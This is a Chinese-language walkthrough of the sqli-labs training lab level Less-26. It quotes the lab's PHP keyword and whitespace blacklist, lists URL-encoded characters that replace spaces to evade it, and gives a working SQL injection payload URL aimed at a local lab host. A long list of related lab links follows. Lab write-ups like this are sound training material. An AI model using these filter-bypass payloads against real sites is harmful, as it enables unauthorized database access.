sqli-labs————Less-26(繞空格、/*、#等)
Less-26
從這裡的提示,我們可以看出這一關過濾了空格。
我們可以檢視原始碼,看看它的過濾機制:
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
注意:由於Windows下無法使用一些特殊字元來替換空格,所以這裡為了更好的體驗建議讀者使用Linux下的環境。
從上面的過濾機制我們可以發現對“or”、“and”、“/*”、“#”、“--”“/”等特殊符號都進行了過濾,此處對於and和or的繞過方法就不再多說了,這裡我們講述幾種技巧:
繞空格:
%09 TAB鍵(水平)
%0a 新建一行
%0c 新的一頁
%0d return功能
%0b TAB鍵(垂直)
%a0 空格
在這一關中sql語句為:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
注意:對於註釋和結尾字元我們只可以使用一個“ ’”來閉合後面的單引號。
下面給出一個payload:
http://192.168.11.136/sqli-labs/Less-26?id=1'%a0||'1'='1
讀者可以自我在Linux環境中證實!相關文章
- sqli-labs ————less -27(union、SELECT、繞過濾)SQL
- sqli-labs ————less -27a(union、SELECT、繞過濾)SQL
- EditText追加空格、限制字元等字元
- 安卓資源字串中加全形空格、半形空格、換行、@%等特殊字元安卓字串字元
- 解決eslint空格報錯等問題EsLint
- sqli-labs————Less-34(寬位元組繞過、水平越權、盲注)SQL
- pycharm 取消空格,逗號 等符號的自動補全PyCharm符號
- sqli-labs————寬位元組注入(可以用於繞過濾了單引號或者\的WAF)SQL
- Visual Studio Code 程式碼顯示空格等空白符的方法
- Python-按空格分割,多個空格當一個空格Python
- sqli-labsSQL
- JS 移除空格JS
- hive去除空格Hive
- 替換空格
- js繞過-前端加密繞過JS前端加密
- sqli-Labs————less-35SQL
- sqli-Labs————less-36SQL
- sqli-Labs————less-37SQL
- sqli-Labs————less-38SQL
- sqli-Labs————less-39SQL
- sqli-Labs————less-40SQL
- sqli-Labs————less-41SQL
- sqli-Labs————less-42SQL
- sqli-Labs————less-43SQL
- sqli-Labs————less-44SQL
- sqli-Labs————less-45SQL
- sqli-labs————Less-48SQL
- sqli-labs————Less-49SQL
- sqli-labs————Less-51SQL
- sqli-labs————Less-52SQL
- sqli-labs————Less-53SQL
- sqli-labs————Less-55SQL
- sqli-labs————Less-56SQL
- sqli-labs————Less-57SQL
- sqli-labs————Less-58SQL
- sqli-labs————Less-59SQL
- sqli-labs ————less -26aSQL
- sqli-labs————Less-28SQL